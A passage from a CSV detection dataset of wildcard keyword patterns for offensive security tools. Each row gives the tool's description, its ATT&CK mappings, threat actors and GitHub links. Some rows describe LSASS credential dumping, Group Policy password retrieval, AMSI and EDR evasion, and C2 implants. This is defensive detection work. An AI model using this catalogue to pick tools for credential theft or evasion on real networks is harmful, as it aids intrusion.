TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" +"*-out*.exe -r:*System.Drawing.dll*System.Management.Automation*.dll*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. 
HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","0","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" +"*--out=nimcrypt*","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","0","N/A","N/A","1","83","5","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z" +"*Out-CompressedDLL.ps1*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*Out-DnsTxt.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Outflank-Dumpert*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*Outflank-Dumpert.*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*outflanknl/Dumpert*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. 
This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*outflanknl/EvilClippy*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" +"*outflanknl/Net-GPPPassword*","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","156","37","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" +"*outflanknl/Recon-AD*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*outflanknl/SharpHide*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" +"*outflanknl/Spray-AD*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","408","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" +"*outflanknl/WdToggle*","offensive_tool_keyword","cobaltstrike","s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" +"*Outflank-Recon-AD*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*OutlookEmailAbuse.ps1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*Out-Minidump.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Out-ObfuscatedAst.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*Out-ObfuscatedStringCommand.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*Out-ObfuscatedTokenCommand.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for 
auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*output*kitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*Output.aes.zip*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*output/AccountsWithSPN.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AdminAccessComputers.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AllDomainControllers.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - 
T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AllDomainGroups.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AllDomainHosts.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AllDomainUserAccounts.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AllDomainUsers.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AllServers.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AllServers2k12.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD 
Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AllServers2k16.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AllServers2k19.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AllServers2k22.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AllServers2k8.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/AllTrusts.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/CompletedDescriptionField.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD 
Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/DescriptionContainsPass.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/DNETAccountsByDescription.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/DomainAdmins.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/DomainGroupsLocalAdmin.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/DomainUserAccountsWithCompletedADDescription.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/ExchangeServers.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD 
Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/html/data/beacons.json*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*output/NeverLoggedInAccounts.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/NonDCWindows10Computers.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - 
T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/NonDCWindows11Computers.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/NonDCWindows7Computers.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/PasswordNeverExpire.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/payloads/*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*output/RatChatPT_unix*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*output/RDPMachines.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/UsersInDomainAdminsGroup.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - 
T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/UsersLastPasswordChange.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/UsersNoPasswordRequired.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/UsersPasswordMustChange.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/UsersPasswordNotChanged.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*output/WinRMMachines.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*Out-RundllCommand*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security 
